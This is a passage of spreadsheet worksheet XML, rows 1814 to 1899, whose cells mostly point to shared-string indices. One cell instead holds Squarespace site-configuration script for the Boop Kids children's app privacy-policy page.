    <row r="1814" spans="1:2">
      <c r="A1814" t="s">
        <v>44</v>
      </c>
      <c r="B1814" t="s">
        <v>1375</v>
      </c>
    </row>
    <row r="1815" spans="1:2">
      <c r="A1815" t="s">
        <v>44</v>
      </c>
      <c r="B1815" t="s">
        <v>1376</v>
      </c>
    </row>
    <row r="1816" spans="1:2">
      <c r="A1816" t="s">
        <v>44</v>
      </c>
      <c r="B1816" t="s">
        <v>1377</v>
      </c>
    </row>
    <row r="1817" spans="1:2">
      <c r="A1817" t="s">
        <v>44</v>
      </c>
      <c r="B1817">
        <f> {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-cfb9ca391e5434cccb495-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-d61ee22e7c56cbfe6bf6f-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-a03ec6aa3252c6c79a13c-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-3a18a40d3a28179a79fe4-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-97452adf98b259487f44f-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-dd96b4be33459afc5aed8-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-57c1789de4c416ce9982b-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-4d72177710b16966fd304-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-af841a4de517d1960ffe3-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-a1067e56130bfa7beb364-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-7bf44765a935060ae0761-min.en-US.js"}},"pageType":2,"website":{"id":"5b0d9d80cef3725738f0567c","identifier":"chimes-finch-tc4b","websiteType":1,"contentModifiedOn":1680722624065,"cloneable":false,"hasBeenCloneable":false,"developerMode":false,"siteStatus":{},"language":"en-US","timeZone":"America/New_York","machineTimeZoneOffset":-14400000,"timeZoneOffset":-14400000,"timeZoneAbbr":"EDT","siteTitle":"Boop Kids - Fun Games for Kids and Family","fullSiteTitle":"Privacy Policy \u2014 Boop Kids - Fun Games for Kids and Family","siteTagLine":"Fun Games for Kids and Family","siteDescription":"&lt;p&gt;Boop Kids is the first kids and parenting iOS and Android app that allows parents and relatives to be in touch with kids in your family through fun videos and educational mini games for boys and girls. Great for toddlers and preschoolers. The app helps in the development of your child.&lt;/p&gt;","location":{"addressLine1":"","addressLine2":"","addressCountry":""},"logoImageId":"5b6c5432032be40153877d11","socialLogoImageId":"5b6c4ebf8985835b3fd2c072","shareButtonOptions":{"3":true,"2":true,"1":true},"logoImageUrl":"//images.squarespace-cdn.com/content/v1/5b0d9d80cef3725738f0567c/1533826098847-OY5XZ2AXPW9PZT9KEV1X/BoopKid+White.png","socialLogoImageUrl":"//images.squarespace-cdn.com/content/v1/5b0d9d80cef3725738f0567c/1533824703682-OS0SUKR3BACNTFUC92US/BoopKid+Fullcolor.png","authenticUrl":"https://www.boopkids.com","internalUrl":"https://chimes-finch-tc4b.squarespace.com","baseUrl":"https://www.boopkids.com","primaryDomain":"www.boopkids.com","sslSetting":3,"isHstsEnabled":true,"socialAccounts":[{"serviceId":64,"userId":"7880114533","userName":"boopkidslatam","screenname":"Boop Kids Latam","addedOn":1533834173302,"profileUrl":"http://instagram.com/boopkids","iconUrl":"https://scontent.cdninstagram.com/vp/2ee097c03bfa62458d3190098c44998a/5C053DE0/t51.2885-19/s150x150/33480986_586550388384584_4036308074623926272_n.jpg","collectionId":"5b6c73bd697a986b6920dea2","iconEnabled":true,"serviceName":"instagram-unauth"},{"serviceId":60,"userId":"10156549008579931","screenname":"Max Dangelo","addedOn":1533835087762,"profileUrl":"http://www.facebook.com/BoopKids","iconUrl":"http://graph.facebook.com/10156549008579931/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook-unauth"},{"serviceId":69,"userId":"UC3OreNab2XlQx5j5pCg9CdQ","screenname":"YouTube","addedOn":1534356076880,"profileUrl":"https://youtube.com/boopkids","iconUrl":"https://yt3.ggpht.com/a-/ACSszfFhpwWo1zovDD4vhGpC0RPjQcyfi4PZsRVdLQ=s88-mo-c-c0xffffffff-rj-k-no","iconEnabled":true,"serviceName":"youtube-unauth"},{"serviceId":62,"userId":"999737096083595266","userName":"boopkidslatam","screenname":"Boop Kids Latam","addedOn":1534269499121,"profileUrl":"https://twitter.com/boopkids","iconUrl":"http://pbs.twimg.com/profile_images/1001105343123017728/kUqsScN8_normal.jpg","collectionId":"5b73183b96e76fbab2a6b363","iconEnabled":true,"serviceName":"twitter-unauth"},{"serviceId":82,"screenname":"TikTok","addedOn":1670950993589,"profileUrl":"http://www.tiktok.com/@boopkids.app","iconEnabled":true,"serviceName":"tiktok-unauth"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"captchaSettings":{"enabledForDonations":false},"showOwnerLogin":false},"websiteSettings":{"id":"5b0d9d80cef3725738f0567f","websiteId":"5b0d9d80cef3725738f0567c","type":"Business","subjects":[],"country":"AR","state":"C","simpleLikingEnabled":true,"mobileInfoBarSettings":{"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"popupOverlaySettings":{"style":1,"showOnScroll":false,"scrollPercentage":25,"showOnTimer":true,"timerDelay":30000,"showUntilSignup":true,"displayFrequency":1,"enableMobile":true,"enabledPages":[],"showOnAllPages":true,"version":1},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":false,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":true,"contactPhoneNumber":"","businessHours":{"monday":{"text":"","ranges":[{}]},"tuesday":{"text":"","ranges":[{}]},"wednesday":{"text":"","ranges":[{}]},"thursday":{"text":"","ranges":[{}]},"friday":{"text":"","ranges":[{}]},"saturday":{"text":"","ranges":[{}]},"sunday":{"text":"","ranges":[{}]}},"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":false,"enableMailingListOptInByDefault":false,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":true,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;By using this website you approve the use of cookie technology.&lt;/p&gt;","cookieBannerTheme":"LIGHT","cookieBannerVariant":"BAR","cookieBannerPosition":"BOTTOM","cookieBannerCtaVariant":"ICON","cookieBannerCtaText":"OK","cookieBannerAcceptType":"OPT_IN"},"websiteCloneable":false,"collection":{"title":"Privacy Policy","id":"5b6896ab8a922d0e7d3baf8b","fullUrl":"/privacy-policy","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Slideshow","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"350px","gridSpacing":"20px","tweak-blog-list-columns":"3","tweak-blog-list-item-image-aspect-ratio-grid":"3:2 Standard","tweak-blog-list-item-image-aspect-ratio-stacked":"1:1 Square","tweak-blog-list-item-image-show":"true","tweak-blog-list-spacing":"40px","tweak-blog-list-style":"Grid","tweak-footer-layout":"Stacked","tweak-header-bottom-overlay-on-index-gallery":"false","tweak-index-gallery-apply-bottom-spacing":"true","tweak-index-gallery-autoplay-duration":"2","tweak-index-gallery-autoplay-enable":"true","tweak-index-gallery-fixed-height":"true","tweak-index-gallery-height":"100vh","tweak-index-gallery-indicators":"Lines","tweak-index-gallery-layout":"Packed","tweak-index-gallery-transition":"Fade","tweak-index-gallery-transition-duration":"500","tweak-index-nav-position":"Right","tweak-index-page-apply-bottom-spacing":"false","tweak-index-page-fullscreen":"All Pages","tweak-index-page-min-height":"73vh","tweak-mobile-breakpoint":"640px","tweak-overlay-parallax-enabled":"false","tweak-overlay-parallax-new-math":"true","tweak-product-item-image-zoom-factor":"2.5","tweak-product-list-item-hover-behavior":"Show Alternate Image","tweak-product-list-items-per-row":"3","tweak-related-products-items-per-row":"3","tweak-related-products-title-spacing":"50px","tweak-site-ajax-loading-enable":"true","tweak-site-border-show":"false","tweak-site-border-width":"8px"},"templateId":"55f0aac0e4b0f0a5b7e0b22e","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/55f0a9b0e4b0f3eb70352f6d/349/scripts/","betaFeatureFlags":["customer_account_creation_recaptcha","send_local_pickup_ready_email","crm_enforce_recaptcha_v3_enterprise","campaigns_content_editing_survey","member_areas_provisioning_service","commerce_etsy_shipping_import","campaigns_import_discounts","commerce_etsy_product_import","commerce_order_status_access","campaigns_new_image_layout_picker","commerce_clearpay","nested_categories_migration_enabled","fluid_engine_clean_up_grid_contextual_change","campaigns_global_uc_ab","campaigns_asset_picker","customer_accounts_email_verification","scripts_defer","member_areas_spanish_interviews","member_areas_schedule_interview","crm_waitlist_enforce_recaptcha_v3_enterprise","accounting_orders_sync","block_annotations_revamp","multilingual_transactional_emails","viewer-role-contributor-invites","order_status_page_checkout_landing_enabled","commerce_restock_notifications","campaigns_show_featured_templates","marketing_landing_page","campaigns_thumbnail_layout","background_art_onboarding","crm_remove_subscriber","campaigns_discount_section_in_automations","crm_default_newsletter_block_to_campaigns","fluid_engine","campaigns_new_subscriber_search","commerce_site_visitor_metrics","crm_enable_recaptcha_v3_enterprise","campaigns_discount_section_in_blasts","site_user_email_change","is_feature_gate_refresh_enabled","crm_retention_segment"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-video-block","mux-data-course-collection"],"impersonatedSession":false,"demoCollections":[{"collectionId":"5a0f11f6e2c483fdf3e0e525","deleted":false}],"tzData":{"zones":[[-300,"US","E%sT",null]],"rules":{"US":[[1967,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun&gt;=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun&gt;=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun&gt;=1","2:00","0","S"]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"America/New_York","name":"Eastern Time"}}};&lt;/script&gt;&lt;script&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://www.boopkids.com","name":"Boop Kids - Fun Games for Kids and Family","description":"&lt;p&gt;Boop Kids is the first kids and parenting iOS and Android app that allows parents and relatives to be in touch with kids in your family through fun videos and educational mini games for boys and girls.</f>
        <v>0</v>
      </c>
    </row>
    <row r="1818" spans="1:2">
      <c r="A1818" t="s">
        <v>44</v>
      </c>
      <c r="B1818" t="s">
        <v>1378</v>
      </c>
    </row>
    <row r="1819" spans="1:2">
      <c r="A1819" t="s">
        <v>44</v>
      </c>
      <c r="B1819" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="1820" spans="1:2">
      <c r="A1820" t="s">
        <v>45</v>
      </c>
      <c r="B1820" t="s">
        <v>1380</v>
      </c>
    </row>
    <row r="1821" spans="1:2">
      <c r="A1821" t="s">
        <v>45</v>
      </c>
      <c r="B1821" t="s">
        <v>1381</v>
      </c>
    </row>
    <row r="1822" spans="1:2">
      <c r="A1822" t="s">
        <v>45</v>
      </c>
      <c r="B1822" t="s">
        <v>1382</v>
      </c>
    </row>
    <row r="1823" spans="1:2">
      <c r="A1823" t="s">
        <v>45</v>
      </c>
      <c r="B1823" t="s">
        <v>1383</v>
      </c>
    </row>
    <row r="1824" spans="1:2">
      <c r="A1824" t="s">
        <v>45</v>
      </c>
      <c r="B1824" t="s">
        <v>1384</v>
      </c>
    </row>
    <row r="1825" spans="1:2">
      <c r="A1825" t="s">
        <v>45</v>
      </c>
      <c r="B1825" t="s">
        <v>1385</v>
      </c>
    </row>
    <row r="1826" spans="1:2">
      <c r="A1826" t="s">
        <v>45</v>
      </c>
      <c r="B1826" t="s">
        <v>1386</v>
      </c>
    </row>
    <row r="1827" spans="1:2">
      <c r="A1827" t="s">
        <v>45</v>
      </c>
      <c r="B1827" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="1828" spans="1:2">
      <c r="A1828" t="s">
        <v>45</v>
      </c>
      <c r="B1828" t="s">
        <v>1388</v>
      </c>
    </row>
    <row r="1829" spans="1:2">
      <c r="A1829" t="s">
        <v>45</v>
      </c>
      <c r="B1829" t="s">
        <v>1389</v>
      </c>
    </row>
    <row r="1830" spans="1:2">
      <c r="A1830" t="s">
        <v>45</v>
      </c>
      <c r="B1830" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="1831" spans="1:2">
      <c r="A1831" t="s">
        <v>45</v>
      </c>
      <c r="B1831" t="s">
        <v>1391</v>
      </c>
    </row>
    <row r="1832" spans="1:2">
      <c r="A1832" t="s">
        <v>45</v>
      </c>
      <c r="B1832" t="s">
        <v>1392</v>
      </c>
    </row>
    <row r="1833" spans="1:2">
      <c r="A1833" t="s">
        <v>45</v>
      </c>
      <c r="B1833" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="1834" spans="1:2">
      <c r="A1834" t="s">
        <v>45</v>
      </c>
      <c r="B1834" t="s">
        <v>1394</v>
      </c>
    </row>
    <row r="1835" spans="1:2">
      <c r="A1835" t="s">
        <v>45</v>
      </c>
      <c r="B1835" t="s">
        <v>1395</v>
      </c>
    </row>
    <row r="1836" spans="1:2">
      <c r="A1836" t="s">
        <v>45</v>
      </c>
      <c r="B1836" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="1837" spans="1:2">
      <c r="A1837" t="s">
        <v>45</v>
      </c>
      <c r="B1837" t="s">
        <v>1397</v>
      </c>
    </row>
    <row r="1838" spans="1:2">
      <c r="A1838" t="s">
        <v>45</v>
      </c>
      <c r="B1838" t="s">
        <v>1398</v>
      </c>
    </row>
    <row r="1839" spans="1:2">
      <c r="A1839" t="s">
        <v>45</v>
      </c>
      <c r="B1839" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="1840" spans="1:2">
      <c r="A1840" t="s">
        <v>45</v>
      </c>
      <c r="B1840" t="s">
        <v>1400</v>
      </c>
    </row>
    <row r="1841" spans="1:2">
      <c r="A1841" t="s">
        <v>46</v>
      </c>
      <c r="B1841" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="1842" spans="1:2">
      <c r="A1842" t="s">
        <v>47</v>
      </c>
      <c r="B1842" t="s">
        <v>1402</v>
      </c>
    </row>
    <row r="1843" spans="1:2">
      <c r="A1843" t="s">
        <v>47</v>
      </c>
      <c r="B1843" t="s">
        <v>1403</v>
      </c>
    </row>
    <row r="1844" spans="1:2">
      <c r="A1844" t="s">
        <v>47</v>
      </c>
      <c r="B1844" t="s">
        <v>1404</v>
      </c>
    </row>
    <row r="1845" spans="1:2">
      <c r="A1845" t="s">
        <v>47</v>
      </c>
      <c r="B1845" t="s">
        <v>1405</v>
      </c>
    </row>
    <row r="1846" spans="1:2">
      <c r="A1846" t="s">
        <v>48</v>
      </c>
      <c r="B1846" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="1847" spans="1:2">
      <c r="A1847" t="s">
        <v>48</v>
      </c>
      <c r="B1847" t="s">
        <v>1407</v>
      </c>
    </row>
    <row r="1848" spans="1:2">
      <c r="A1848" t="s">
        <v>48</v>
      </c>
      <c r="B1848" t="s">
        <v>1408</v>
      </c>
    </row>
    <row r="1849" spans="1:2">
      <c r="A1849" t="s">
        <v>48</v>
      </c>
      <c r="B1849" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="1850" spans="1:2">
      <c r="A1850" t="s">
        <v>48</v>
      </c>
      <c r="B1850" t="s">
        <v>1410</v>
      </c>
    </row>
    <row r="1851" spans="1:2">
      <c r="A1851" t="s">
        <v>48</v>
      </c>
      <c r="B1851" t="s">
        <v>1411</v>
      </c>
    </row>
    <row r="1852" spans="1:2">
      <c r="A1852" t="s">
        <v>48</v>
      </c>
      <c r="B1852" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="1853" spans="1:2">
      <c r="A1853" t="s">
        <v>48</v>
      </c>
      <c r="B1853" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="1854" spans="1:2">
      <c r="A1854" t="s">
        <v>48</v>
      </c>
      <c r="B1854" t="s">
        <v>1414</v>
      </c>
    </row>
    <row r="1855" spans="1:2">
      <c r="A1855" t="s">
        <v>48</v>
      </c>
      <c r="B1855" t="s">
        <v>1415</v>
      </c>
    </row>
    <row r="1856" spans="1:2">
      <c r="A1856" t="s">
        <v>48</v>
      </c>
      <c r="B1856" t="s">
        <v>1416</v>
      </c>
    </row>
    <row r="1857" spans="1:2">
      <c r="A1857" t="s">
        <v>48</v>
      </c>
      <c r="B1857" t="s">
        <v>1417</v>
      </c>
    </row>
    <row r="1858" spans="1:2">
      <c r="A1858" t="s">
        <v>48</v>
      </c>
      <c r="B1858" t="s">
        <v>1418</v>
      </c>
    </row>
    <row r="1859" spans="1:2">
      <c r="A1859" t="s">
        <v>48</v>
      </c>
      <c r="B1859" t="s">
        <v>1419</v>
      </c>
    </row>
    <row r="1860" spans="1:2">
      <c r="A1860" t="s">
        <v>48</v>
      </c>
      <c r="B1860" t="s">
        <v>1420</v>
      </c>
    </row>
    <row r="1861" spans="1:2">
      <c r="A1861" t="s">
        <v>48</v>
      </c>
      <c r="B1861" t="s">
        <v>1421</v>
      </c>
    </row>
    <row r="1862" spans="1:2">
      <c r="A1862" t="s">
        <v>48</v>
      </c>
      <c r="B1862" t="s">
        <v>1422</v>
      </c>
    </row>
    <row r="1863" spans="1:2">
      <c r="A1863" t="s">
        <v>48</v>
      </c>
      <c r="B1863" t="s">
        <v>1423</v>
      </c>
    </row>
    <row r="1864" spans="1:2">
      <c r="A1864" t="s">
        <v>48</v>
      </c>
      <c r="B1864" t="s">
        <v>1424</v>
      </c>
    </row>
    <row r="1865" spans="1:2">
      <c r="A1865" t="s">
        <v>48</v>
      </c>
      <c r="B1865" t="s">
        <v>1425</v>
      </c>
    </row>
    <row r="1866" spans="1:2">
      <c r="A1866" t="s">
        <v>48</v>
      </c>
      <c r="B1866" t="s">
        <v>1426</v>
      </c>
    </row>
    <row r="1867" spans="1:2">
      <c r="A1867" t="s">
        <v>48</v>
      </c>
      <c r="B1867" t="s">
        <v>1427</v>
      </c>
    </row>
    <row r="1868" spans="1:2">
      <c r="A1868" t="s">
        <v>48</v>
      </c>
      <c r="B1868" t="s">
        <v>1428</v>
      </c>
    </row>
    <row r="1869" spans="1:2">
      <c r="A1869" t="s">
        <v>48</v>
      </c>
      <c r="B1869" t="s">
        <v>1429</v>
      </c>
    </row>
    <row r="1870" spans="1:2">
      <c r="A1870" t="s">
        <v>48</v>
      </c>
      <c r="B1870" t="s">
        <v>1430</v>
      </c>
    </row>
    <row r="1871" spans="1:2">
      <c r="A1871" t="s">
        <v>48</v>
      </c>
      <c r="B1871" t="s">
        <v>1431</v>
      </c>
    </row>
    <row r="1872" spans="1:2">
      <c r="A1872" t="s">
        <v>48</v>
      </c>
      <c r="B1872" t="s">
        <v>1432</v>
      </c>
    </row>
    <row r="1873" spans="1:2">
      <c r="A1873" t="s">
        <v>48</v>
      </c>
      <c r="B1873" t="s">
        <v>1433</v>
      </c>
    </row>
    <row r="1874" spans="1:2">
      <c r="A1874" t="s">
        <v>48</v>
      </c>
      <c r="B1874" t="s">
        <v>1434</v>
      </c>
    </row>
    <row r="1875" spans="1:2">
      <c r="A1875" t="s">
        <v>48</v>
      </c>
      <c r="B1875" t="s">
        <v>1435</v>
      </c>
    </row>
    <row r="1876" spans="1:2">
      <c r="A1876" t="s">
        <v>48</v>
      </c>
      <c r="B1876" t="s">
        <v>1436</v>
      </c>
    </row>
    <row r="1877" spans="1:2">
      <c r="A1877" t="s">
        <v>48</v>
      </c>
      <c r="B1877" t="s">
        <v>1437</v>
      </c>
    </row>
    <row r="1878" spans="1:2">
      <c r="A1878" t="s">
        <v>48</v>
      </c>
      <c r="B1878" t="s">
        <v>1438</v>
      </c>
    </row>
    <row r="1879" spans="1:2">
      <c r="A1879" t="s">
        <v>48</v>
      </c>
      <c r="B1879" t="s">
        <v>1439</v>
      </c>
    </row>
    <row r="1880" spans="1:2">
      <c r="A1880" t="s">
        <v>48</v>
      </c>
      <c r="B1880" t="s">
        <v>1440</v>
      </c>
    </row>
    <row r="1881" spans="1:2">
      <c r="A1881" t="s">
        <v>48</v>
      </c>
      <c r="B1881" t="s">
        <v>1441</v>
      </c>
    </row>
    <row r="1882" spans="1:2">
      <c r="A1882" t="s">
        <v>48</v>
      </c>
      <c r="B1882" t="s">
        <v>1442</v>
      </c>
    </row>
    <row r="1883" spans="1:2">
      <c r="A1883" t="s">
        <v>48</v>
      </c>
      <c r="B1883" t="s">
        <v>1443</v>
      </c>
    </row>
    <row r="1884" spans="1:2">
      <c r="A1884" t="s">
        <v>48</v>
      </c>
      <c r="B1884" t="s">
        <v>1444</v>
      </c>
    </row>
    <row r="1885" spans="1:2">
      <c r="A1885" t="s">
        <v>48</v>
      </c>
      <c r="B1885" t="s">
        <v>1445</v>
      </c>
    </row>
    <row r="1886" spans="1:2">
      <c r="A1886" t="s">
        <v>48</v>
      </c>
      <c r="B1886" t="s">
        <v>1446</v>
      </c>
    </row>
    <row r="1887" spans="1:2">
      <c r="A1887" t="s">
        <v>48</v>
      </c>
      <c r="B1887" t="s">
        <v>1447</v>
      </c>
    </row>
    <row r="1888" spans="1:2">
      <c r="A1888" t="s">
        <v>48</v>
      </c>
      <c r="B1888" t="s">
        <v>1448</v>
      </c>
    </row>
    <row r="1889" spans="1:2">
      <c r="A1889" t="s">
        <v>48</v>
      </c>
      <c r="B1889" t="s">
        <v>1449</v>
      </c>
    </row>
    <row r="1890" spans="1:2">
      <c r="A1890" t="s">
        <v>48</v>
      </c>
      <c r="B1890" t="s">
        <v>1450</v>
      </c>
    </row>
    <row r="1891" spans="1:2">
      <c r="A1891" t="s">
        <v>48</v>
      </c>
      <c r="B1891" t="s">
        <v>1451</v>
      </c>
    </row>
    <row r="1892" spans="1:2">
      <c r="A1892" t="s">
        <v>48</v>
      </c>
      <c r="B1892" t="s">
        <v>1452</v>
      </c>
    </row>
    <row r="1893" spans="1:2">
      <c r="A1893" t="s">
        <v>48</v>
      </c>
      <c r="B1893" t="s">
        <v>1453</v>
      </c>
    </row>
    <row r="1894" spans="1:2">
      <c r="A1894" t="s">
        <v>48</v>
      </c>
      <c r="B1894" t="s">
        <v>1454</v>
      </c>
    </row>
    <row r="1895" spans="1:2">
      <c r="A1895" t="s">
        <v>48</v>
      </c>
      <c r="B1895" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="1896" spans="1:2">
      <c r="A1896" t="s">
        <v>48</v>
      </c>
      <c r="B1896" t="s">
        <v>1456</v>
      </c>
    </row>
    <row r="1897" spans="1:2">
      <c r="A1897" t="s">
        <v>48</v>
      </c>
      <c r="B1897" t="s">
        <v>1457</v>
      </c>
    </row>
    <row r="1898" spans="1:2">
      <c r="A1898" t="s">
        <v>49</v>
      </c>
      <c r="B1898" t="s">
        <v>1458</v>
      </c>
    </row>
    <row r="1899" spans="1:2">
      <c r="A1899" t="s">
        <v>49</v>
      </c>
